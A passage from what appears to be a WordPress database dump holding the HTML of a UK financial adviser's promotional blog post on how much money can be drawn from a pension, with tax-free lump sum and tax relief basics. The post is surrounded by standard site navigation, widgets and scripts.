Blog</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-8587\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8587\"><a href=\"../category/annuities/\">Annuities</a></li>&#13;\n		<li id=\"menu-item-8588\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8588\"><a href=\"../category/insurance-protection/\">Insurance Protection</a></li>&#13;\n		<li id=\"menu-item-8589\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8589\"><a href=\"../category\">Investments</a></li>&#13;\n		<li id=\"menu-item-8590\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-8590\"><a href=\"../category/pensions/\">Pensions</a></li>&#13;\n		<li id=\"menu-item-8591\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8591\"><a href=\"../category/\">Trusts</a></li>&#13;\n		<li id=\"menu-item-8592\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-8592\"><a href=\"../category/wealth-management/\">Wealth Management</a></li>&#13;\n	</ul></li>&#13;\n</ul></li>&#13;\n		</ul></nav><div class=\"mobile-nav-holder main-menu\"/>&#13;\n					</div>&#13;\n	</header></div>		<div class=\"init-sticky-header\"/>&#13;\n		</div>&#13;\n						<div id=\"sliders-container\">&#13;\n									</div>&#13;\n		&#13;\n																<div id=\"main\" class=\"clearfix \" style=\"\">&#13;\n		<div class=\"avada-row\" style=\"\">&#13;\n		&#13;\n										<div id=\"post-1545\" class=\"post-1545 post type-post status-publish format-standard has-post-thumbnail hentry category-pensions category-wealth-management post\">&#13;\n												<span class=\"entry-title\" style=\"display: none;\">How much Money can I get out of my Pension?</span>&#13;\n						<div class=\"post-content\">&#13;\n				<h2><b>How Much Money Can I Get Out of My Pension?</b></h2>&#13;\n<p><b>THAT is the question!</b></p>&#13;\n<p>And, like most questions in the world of Pensions – there is never a simple answer.</p>&#13;\n<p>Which in turn leads to more questions.</p>&#13;\n<p><b>So. Where on earth do I stand?</b></p>&#13;\n<p>Let’s see about getting you some answers. After all, it is <b>your pension pot</b> and you should know how much it’s worth and when you can get access to <b>your money</b>. But brace yourself, for there are choices to be made…</p>&#13;\n<p><b>Choices, choices… but ultimately the choice is YOURS!</b></p>&#13;\n<p>As you can imagine there are many different types of pensions, from personal pensions to company-run schemes, final salary, money purchase, self-invested pensions – and the list goes on. But in no way should that put you off.</p>&#13;\n<p>Your pension pot is designed to give you an income which you can take from as early as 55 years of age – <b>and you don’t even have to be retired!</b></p>&#13;\n<p>So now the question is, how do you want it? And when do you want it?</p>&#13;\n<p>You can decide to take it much later, if you decide that you don’t yet need the income.</p>&#13;\n<p>That’s fine.</p>&#13;\n<p>Some people elect to reduce their hours or go part-time as they approach retirement and you can start to draw your pension to supplement your income should you fancy.</p>&#13;\n<p><b>There is always choice.</b></p>&#13;\n<p>In addition to the income, you can also take a lump sum of money which is tax free and will usually total up to 25% of your total pension pot, <b>which is why it’s important to know how much your fund is worth</b>. This can be seen as a reward for saving over the years to build your retirement income and the <b>tax-free lump sum</b> can be used for anything you want.</p>&#13;\n<p><b>Think about it. Anything you want. You deserve it.</b></p>&#13;\n<p><b>You deserve some TLC.</b></p>&#13;\n<p>That’s right. There are 3 ‘T’s which can really boost your pension – <b>and you</b>.</p>&#13;\n<p><b>Time. Tax Relief. Tender Loving Care.</b></p>&#13;\n<p><b>Start early…</b></p>&#13;\n<p>Although your pension contributions may have been modest, if they have been invested over a long period of <b>time</b>, and with the help of the tax relief that they would have attracted, <b>you may find that your pot is healthier than you first might have imagined</b>.</p>&#13;\n<p>Starting your pension as early as possible will make a big difference to the amount available as the longer it is invested, <b>the longer the fund has to grow</b>.</p>&#13;\n<p><b>Feel the relief…</b></p>&#13;\n<p><b>Tax relief</b> will also have a great effect on the value of your contributions. This is a big boost to every contribution you make and <b>not something to ignore</b>. As a basic rate tax payer you will get £20 tax relief for every £80 you invest.</p>&#13;\n<p><b>Take care…</b></p>&#13;\n<p>Finally, the <b>tender loving care</b> is the help to <b>take your pension from good to great</b>. Working with an Independent Financial Adviser will make sure that your pension is invested in funds which perform <b>for you</b>.</p>&#13;\n<p>We’ll also keep a beady expert eye on the charges being applied to the pension product and help you get the best from your pension pot when you finally wish to take the benefits.</p>&#13;\n<p><b>It’s up to you. But you’re not alone.</b></p>&#13;\n<p>So, there we are. How much you get can sometimes be up to you. Keeping an eye on your pension and making small changes can make a <b>big difference</b> when you finally want to take the income and the tax-free cash. Also, knowing how much you can expect from your pension can help you to plan better for the future.</p>&#13;\n<p><b>Knowing your pension. Gaining better returns. Enjoying a brighter future. </b></p>&#13;\n<p><b>Those are the answers you want. So, any questions?</b></p>&#13;\n<p>For expert, professional and above all <b>FRIENDLY</b> advice regarding pensions call Equity SMART on  or click here to contact us.</p>&#13;\n<p>No pressure. No obligation. Just your best interests at heart.</p>&#13;\n<p style=\"text-align: center;\">&#13;\n							</p></div>&#13;\n									<div class=\"meta-info\">&#13;\n				<div class=\"vcard\">&#13;\n					By <span class=\"fn\"><a href=\"../author/rs-r-admin/\" title=\"Posts by Equity SMART\" rel=\"author\">Equity SMART</a></span><span class=\"sep\">|</span>Categories: <a href=\"../category/pensions/\" title=\"View all posts in Pensions\" rel=\"category tag\">Pensions</a>, <a href=\"../category/wealth-management/\" title=\"View all posts in Wealth Management\" rel=\"category tag\">Wealth Management</a><span class=\"sep\">|</span><span class=\"meta-tags\">Tags: </span><span class=\"sep\">|</span><a href=\"../how-much-money-can-i-get-pension/\" title=\"Comment on How much Money can I get out of my Pension?\">0 Comments</a>				</div>&#13;\n			</div>&#13;\n												<div class=\"share-box\">&#13;\n				<h4> </h4>&#13;\n				<ul class=\"social-networks social-networks-dark\"><li class=\"facebook\">&#13;\n						<a href=\"http://www.facebook.com/sharer.php?m2w&amp;s=100&amp;p[url]=http://www.equalitywalk.org.uk/how-much-money-can-i-get-pension/&amp;p[title]=How%20much%20Money%20can%20I%20get%20out%20of%20my%20Pension?\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Facebook&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Facebook</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"twitter\">&#13;\n						<a href=\"http://twitter.com/home?status=How+much+Money+can+I+get+out+of+my+Pension%3F%20http://www.equalitywalk.org.uk/how-much-money-can-i-get-pension/\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Twitter&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Twitter</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"linkedin\">&#13;\n						<a href=\"http://linkedin.com/shareArticle?mini=true&amp;url=http://www.equalitywalk.org.uk/how-much-money-can-i-get-pension/&amp;title=How%20much%20Money%20can%20I%20get%20out%20of%20my%20Pension?\" target=\"_blank\" rel=\"nofollow\">&#13;\n							LinkedIn&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>LinkedIn</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"reddit\">&#13;\n						<a href=\"http://reddit.com/submit?url=http://www.equalitywalk.org.uk/how-much-money-can-i-get-pension/&amp;title=How%20much%20Money%20can%20I%20get%20out%20of%20my%20Pension?\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Reddit&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Reddit</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"tumblr\">&#13;\n						<a href=\"http://www.tumblr.com/share/link?url=http%3A%2F%2Fwww.equalitywalk.org.uk%2Fhow-much-money-can-i-get-pension%2F&amp;name=How+much+Money+can+I+get+out+of+my+Pension%3F&amp;description=How+Much+Money+Can+I+Get+Out+of+My+Pension%3F+THAT+is+the+question%21+And%2C+like+most+questions+in+the+world+of+Pensions+%E2%80%93+there+is+never+a+simple+answer.+Which+in+turn+leads+to+more+questions.+So.+Where+on+earth+do+I+stand%3F+Let%E2%80%99s+%5B%26hellip%3B%5D\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Tumblr&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Tumblr</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"google\">&#13;\n						<a href=\"https://plus.google.com/share?url=http://www.equalitywalk.org.uk/how-much-money-can-i-get-pension/\" onclick=\"javascript:window.open(this.href,&#13;&#10;  \'\', \'menubar=no,toolbar=no,resizable=yes,scrollbars=yes,height=600,width=600\');return false;\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Google +1&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Google +1</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"tf-pinterest\">&#13;\n												<a href=\"#\">&#13;\n							Pinterest&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Pinterest</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"email\">&#13;\n						<a href=\"mailto:?subject=How much Money can I get out of my Pension?&amp;body=http://www.equalitywalk.org.uk/how-much-money-can-i-get-pension/\">&#13;\n							Email&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Email</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n									</ul></div>&#13;\n									<div class=\"about-author\">&#13;\n				<div class=\"title\"><h2>About the Author: <a href=\"../author/rs-r-admin/\" title=\"Posts by Equity SMART\" rel=\"author\">Equity SMART</a></h2><div class=\"title-sep-container\"><div class=\"title-sep\"/></div></div>&#13;\n				<div class=\"about-author-container\">&#13;\n					<div class=\"avatar\">&#13;\n											</div>&#13;\n					<div class=\"description\">&#13;\n											</div>&#13;\n				</div>&#13;\n			</div>&#13;\n			&#13;\n												&#13;\n							&#13;\n<!-- You can start editing here. -->&#13;\n&#13;\n&#13;\n			<!-- If comments are open, but there are no comments. -->&#13;\n&#13;\n	 &#13;\n&#13;\n&#13;\n									<div id=\"respond\" class=\"comment-respond\">&#13;\n				<h3 id=\"reply-title\" class=\"comment-reply-title\"><div class=\"title\"><h2> </h2><div class=\"title-sep-container\"><div class=\"title-sep\"/></div></div> <small><a rel=\"nofollow\" id=\"cancel-comment-reply-link\" href=\"../how-much-money-can-i-get-pension/\" style=\"display:none;\">Cancel reply</a></small>&#13;\n									</h3><form action=\"/\" method=\"post\" id=\"commentform\" class=\"comment-form\">&#13;\n																										<div id=\"comment-input\"><input type=\"text\" name=\"author\" id=\"author\" value=\"\" placeholder=\"Name (required)\" size=\"22\" tabindex=\"1\" aria-required=\"true\" class=\"input-name\"/><input type=\"text\" name=\"email\" id=\"email\" value=\"\" placeholder=\"Email (required)\" size=\"22\" tabindex=\"2\" aria-required=\"true\" class=\"input-email\"/></div>&#13;\n												<div id=\"comment-textarea\"/>												<p class=\"form-submit\">&#13;\n							<input name=\"submit\" type=\"submit\" id=\"comment-submit\" value=\"Post Comment\"/><input type=\"hidden\" name=\"comment_post_ID\" value=\"1545\" id=\"comment_post_ID\"/></p>&#13;\n						<p style=\"display: none;\"><input type=\"hidden\" id=\"akismet_comment_nonce\" name=\"akismet_comment_nonce\" value=\"4f2b3ce3fc\"/></p>&#13;\n<p style=\"display: none;\"><input type=\"hidden\" id=\"ak_js\" name=\"ak_js\" value=\"204\"/></p>					&#13;\n							</form></div><!-- #respond -->&#13;\n			        <script type=\"text/javascript\"><![CDATA[\r\n            jQuery(document).ready(function () {\r\n                jQuery(\'#commentform\').submit(function () {\r\n                    _gaq.push(\r\n                            [\'_setAccount\', \'UA-10958181-3\'],\r\n                            [\'_trackEvent\', \'comment\', \'submit\']\r\n                    );\r\n                });\r\n            });\r\n        ]]></script></div>&#13;\n			</div>&#13;\n		<div id=\"sidebar\" style=\"float:right;\">&#13;\n	<div id=\"text-24\" class=\"widget widget_text\">			<div class=\"textwidget\"><center><big><big><big>JOIN OVER 5,000</big></big></big><br/><br/>people who get our best financial wisdom on a weekly basis.</center><br/><a href=\"https://my.leadpages.net/leadbox/1449111f3f72a2%3A125d9572eb46dc/5763711893504000/\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-widget\',\'http://my.leadpages.net\']);\" target=\"_blank\"/><script type=\"text/javascript\" src=\"../leadbox-694.js\"/></div>&#13;\n		</div><div id=\"recent_works-widget-2\" class=\"widget recent_works\"><div class=\"heading\"><p>New Guides</p></div>		<div class=\"recent-works-items clearfix\">&#13;\n										<a href=\"../portfolio-items/smart-money-nov-dec/\" title=\"Smart Money: Nov-Dec\">&#13;\n					</a>&#13;\n								<a href=\"../portfolio-items/critical-illness-guide/\" title=\"Critical Illness Guide\">&#13;\n					</a>&#13;\n								<a href=\"../portfolio-items/guide-auto-enrolment/\" title=\"A Guide To Auto Enrolment\">&#13;\n					</a>&#13;\n				</div>&#13;\n&#13;\n		</div><div id=\"pyre_tabs-widget-2\" class=\"widget pyre_tabs\">		<div class=\"tab-holder\">&#13;\n			<div class=\"tab-hold tabs-wrapper\">&#13;\n				<ul id=\"tabs\" class=\"tabset tabs\"><li><a href=\"#tab-popular\">Popular</a></li>&#13;\n															<li><a href=\"#tab-recent\">Recent</a></li>&#13;\n														</ul><div class=\"tab-box tabs-container\">&#13;\n										<div id=\"tab-popular\" class=\"tab tab_content\" style=\"display: none;\">&#13;\n												<ul class=\"news-list\"><li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../can-i-sell-my-pension-under-55/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../can-i-sell-my-pension-under-55/\">Can I sell my Pension under 55?</a>&#13;\n									<div class=\"meta\">&#13;\n										October 12th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../best-annuity-rates/\">&#13;\n										<img width=\"52\" height=\"43\" src=\"../wp-content/uploads/2013/02/Lighthouse-symbolism-image-photo1-e1364375976209.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"Annuity Rates\"/></a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../best-annuity-rates/\">What Are The Best Annuity Rates in The UK</a>&#13;\n									<div class=\"meta\">&#13;\n										March 21st, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/\">The UK’s Income Protection Time Bomb</a>&#13;\n									<div class=\"meta\">&#13;\n										September 10th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../g-day-impact-gender-directive-insurance/\">&#13;\n										<img width=\"52\" height=\"21\" src=\"../wp-content/uploads/2012/09/headline-image-composite-preview.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"headline-image-composite-preview\"/></a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../g-day-impact-gender-directive-insurance/\">G-day – Impact of the Gender Directive on Insurance</a>&#13;\n									<div class=\"meta\">&#13;\n										September 18th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../what-does-a-wealth-managerdo/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../what-does-a-wealth-managerdo/\">What Does a Wealth Manager Do?</a>&#13;\n									<div class=\"meta\">&#13;\n										September 5th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n													</ul></div>&#13;\n															<div id=\"tab-recent\" class=\"tab tab_content\" style=\"display: none;\">&#13;\n												<ul class=\"news-list\"><li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/\">How Your Smartphone Can Improve Your Health</a>&#13;\n									<div class=\"meta\">&#13;\n										June 10th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../5-facts-know-annuities/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../5-facts-know-annuities/\">5 Facts You Should Know About Annuities</a>&#13;\n									<div class=\"meta\">&#13;\n										June 9th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../new-individual-savings-accounts-qa/\">The New Individual Savings Accounts — Q&amp;A</a>&#13;\n									<div class=\"meta\">&#13;\n										June 6th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../automatic-enrolment/\">What is Automatic Enrolment</a>&#13;\n									<div class=\"meta\">&#13;\n										June 6th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../staging-date-social-advisors/\">When is your Staging Date Social Advisors</a>&#13;\n									<div class=\"meta\">&#13;\n										June 6th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n													</ul></div>&#13;\n														</div>&#13;\n			</div>&#13;\n		</div>&#13;\n		</div><div id=\"categories-3\" class=\"widget widget_categories\"><div class=\"heading\"><p>Post Categories</p></div><select name=\"cat\" id=\"cat\" class=\"postform\"><option value=\"-1\">Select Category</option><option class=\"level-0\" value=\"13\">Annuities  (2)</option><option class=\"level-0\" value=\"8\">Insurance Protection  (5)</option><option class=\"level-0\" value=\"5\">Investments  (3)</option><option class=\"level-0\" value=\"4\">Pensions  (9)</option><option class=\"level-0\" value=\"6\">Trusts  (1)</option><option class=\"level-0\" value=\"33\">Video  (4)</option><option class=\"level-0\" value=\"1\">Wealth Management  (17)</option></select><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\n	var dropdown = document.getElementById(\"cat\");\r\n	function onCatChange() {\r\n		if ( dropdown.options[dropdown.selectedIndex].value > 0 ) {\r\n			location.href = \"http://www.equalitywalk.org.uk/?cat=\"+dropdown.options[dropdown.selectedIndex].value;\r\n		}\r\n	}\r\n	dropdown.onchange = onCatChange;\r\n/* ]]]]><![CDATA[> */\r\n]]></script></div><div id=\"social_links-widget-2\" class=\"widget social_links\"><div class=\"heading\"><p>Get Social</p></div>		<ul class=\"social-networks  clearfix\"><li class=\"rss\">&#13;\n				<a class=\"rss\" href=\"http://feeds.feedburner.com/Equity SMART\" target=\"_blank\" rel=\"nofollow\">RSS</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>RSS</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n												<li class=\"twitter\">&#13;\n				<a class=\"twitter\" href=\"https://twitter.com/Invest\" target=\"_blank\" rel=\"nofollow\">Twitter</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>Twitter</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n																																																								</ul></div><div id=\"text-23\" class=\"widget widget_text\">			<div class=\"textwidget\"><a href=\"https://my.leadpages.net/leadbox/14392e473f72a2%3A125d9572eb46dc/5699942098141184/\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-widget\',\'http://my.leadpages.net\']);\" target=\"_blank\"><img src=\"../WcBxvj97f6ImTTzlT4h-unuce5ZXpmlrf0JzFKpvBWJyilIlbrxaszuw0Y2NMVq3U1GZSw9_oe6GL-pXCIamWAg_s0.jpg\"/></a><script type=\"text/javascript\" src=\"../leadbox-690.js\"/></div>&#13;\n		</div>	</div>&#13;\n		</div>&#13;\n	</div>&#13;\n				<footer class=\"footer-area\"><div class=\"avada-row\">&#13;\n			<section class=\"columns columns-3\"><article class=\"col\"><div id=\"recent-posts-3\" class=\"footer-widget-col widget_recent_entries\">		<p>Our Latest Posts</p>		<ul><li>&#13;\n				<a href=\"/\">How Your Smartphone Can Improve Your Health</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../5-facts-know-annuities/\">5 Facts You Should Know About Annuities</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../new-individual-savings-accounts-qa/\">The New Individual Savings Accounts — Q&amp;A</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../automatic-enrolment/\">What is Automatic Enrolment</a>&#13;\n						</li>&#13;\n				</ul><div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div id=\"contact_info-widget-2\" class=\"footer-widget-col contact_info\"><p>Contact Info</p>		<div class=\"contact-info-container\">&#13;\n				<p class=\"address\">Manchester &amp; London</p>&#13;\n		&#13;\n				<p class=\"phone\">Phone: </p>&#13;\n		&#13;\n		&#13;\n		&#13;\n				<p class=\"email\">Email: <a href=\"mailto:enquiries@equalitywalk.org.uk\">Click To Email</a></p>&#13;\n		&#13;\n				&#13;\n				</div>&#13;\n		<div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div style=\"clear:both;\"/></article></section></div>				&#13;\n&#13;\n				<article class=\"col last\"/></footer><footer id=\"footer\"/><!-- wrapper --><script type=\"text/javascript\" src=\"../maps/api/js_v_3.exp_amp_sensor_false_amp_language_en.js\"/><!-- W3TC-include-js-head --><script type=\"text/javascript\"><![CDATA[\r\njQuery(window).load(function() {\r\n\r\njQuery( \'#wooslider-id-1\' ).flexslider2({namespace: \"wooslider-\"\r\n, animation: \'fade\', slideshowSpeed: 7000, animationSpeed: 600, slideshow: true, directionNav: true, keyboard: false, mousewheel: false, pausePlay: false, randomize: false, animationLoop: true, pauseOnAction: true, pauseOnHover: false, smoothHeight: false, touch: true, controlNav: true});\r\n\r\n});\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.form.min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar _wpcf7 = {\"loaderUrl\":\"http://www.equalitywalk.org.uk/wp-content/plugins/contact-form-7/images/ajax-loader.gif\",\"sending\":\"Sending ...\",\"cached\":\"1\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/contact-form-7/includes/js/scripts.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/swfupload.min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar iphormL10n = {\"error_submitting_form\":\"An error occurred submitting the form\",\"swfupload_flash_url\":\"http://www.equalitywalk.org.uk/wp-includes/js/swfupload/swfupload.swf\",\"swfupload_upload_url\":\"http://www.equalitywalk.org.uk/?iphorm_swfupload=1\",\"swfupload_too_many\":\"You have attempted to queue too many files\",\"swfupload_file_too_big\":\"This file exceeds the maximum upload size\",\"swfupload_file_empty\":\"This file is empty\",\"swfupload_file_type_not_allowed\":\"This file type is not allowed\",\"swfupload_unknown_queue_error\":\"Unknown queue error, please try again later\",\"swfupload_upload_error\":\"Upload error\",\"swfupload_upload_failed\":\"Upload failed\",\"swfupload_server_io\":\"Server IO error\",\"swfupload_security_error\":\"Security error\",\"swfupload_limit_exceeded\":\"Upload limit exceeded\",\"swfupload_validation_failed\":\"Validation failed\",\"swfupload_upload_stopped\":\"Upload stopped\",\"swfupload_unknown_upload_error\":\"Unknown upload error\",\"plugin_url\":\"http://www.equalitywalk.org.uk/wp-content/plugins/iphorm-form-builder\",\"preview_no_submit\":\"The form cannot be submitted in the preview\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.iphorm.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.smooth-scroll.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/qtip2/jquery.qtip.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/fancybox/jquery.fancybox-1.3.4.pack.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/uniform/jquery.uniform.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.infieldlabel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/themes/light/rounded.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.mousewheel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.flexslider.min.js\"/><script type=\"text/javascript\" src=\"../wp-includes/js/comment-reply.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/modernizr-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.carouFredSel-6.2.1-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.prettyPhoto-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.flexslider-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.fitvids-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/gmap-min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar js_local_vars = {\"dropdown_goto\":\"Go to...\",\"mobile_nav_cart\":\"Shopping Cart\",\"page_smoothHeight\":\"false\",\"flex_smoothHeight\":\"false\",\"language_flag\":\"ICL_LANGUAGE_CODE\",\"infinite_blog_finished_msg\":\"<em>All posts displayed</em>\",\"infinite_blog_text\":\"<em>Loading the next set of posts...</em>\",\"portfolio_loading_text\":\"<em>Loading Portfolio Items...</em>\",\"faqs_loading_text\":\"<em>Loading FAQ Items...</em>\",\"order_actions\":\"Details\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/main.js\"/></body>','&#13;\n	How much Money can I get out of my Pension?','It is your pension pot, shouldn\'t you know how much it\'s worth and when you can get access to your money.','publish','closed','closed','','how-much-money-can-i-get-out-of-my-pension','','','2017-09-21 16:34:32','2017-09-21 16:34:32','',0,'http://www.equalitywalk.org.uk/how-much-money-can-i-get-out-of-my-pension',0,'page','',0),(73,1,'2017-09-21 16:34:32','2017-09-21 16:34:32','<body class=\"page page-id-137 page-child parent-pageid-25 page-template page-template-full-width-php light  wpb-js-composer js-comp-ver-3.5.4 vc_responsive\">&#13;\n&#13;\n&#13;\n&#13;\n&#13;\n	<div id=\"wrapper\">&#13;\n					<div class=\"header-wrapper\">&#13;\n			<div class=\"header-v2\">&#13;\n		&#13;\n		<header id=\"header\"><div class=\"avada-row\" style=\"margin-top:0px;margin-bottom:0px;\">&#13;\n			&#13;\n						<nav id=\"nav\" class=\"nav-holder\"><ul id=\"nav\" class=\"menu\"><li id=\"menu-item-7214\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-7214\"><a href=\"/wealth-management\">Wealth Management</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-44\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-44\"><a href=\"/wealth-platform\">Wealth Platform</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-27\" class=\"menu-item menu-item-type-post_type menu-item-object-page current-page-ancestor current-menu-ancestor current-menu-parent current-page-parent current_page_parent current_page_ancestor menu-item-has-children menu-item-27\"><a href=\"/pensions\">Pensions</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-967\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-967\"><a href=\"/pensions/pension-release\">Pension Release</a></li>&#13;\n	<li id=\"menu-item-741\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-741\"><a href=\"/pensions/pension-transfer\">Pension Transfer</a></li>&#13;\n	<li id=\"menu-item-136\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-136\"><a href=\"/pensions/auto-enrolment-pensions\">Auto Enrolment Pensions</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-6494\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6494\"><a href=\"/auto-enrolment-report\">Auto Enrolment Report</a></li>&#13;\n	</ul></li>&#13;\n	<li id=\"menu-item-6154\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6154\"><a href=\"/pension-review\">Pension Review</a></li>&#13;\n	<li id=\"menu-item-95\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-95\"><a href=\"/pensions/sipps\">SIPPS</a></li>&#13;\n	<li id=\"menu-item-105\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-105\"><a href=\"/pensions/stakeholder-pensions\">Stakeholder Pensions</a></li>&#13;\n	<li id=\"menu-item-127\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-127\"><a href=\"/pensions/occupational-pensions\">Occupational Pensions</a></li>&#13;\n	<li id=\"menu-item-133\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-133\"><a href=\"/pensions/group-pension-plan\">Group Pension Plan</a></li>&#13;\n	<li id=\"menu-item-139\" class=\"menu-item menu-item-type-post_type menu-item-object-page 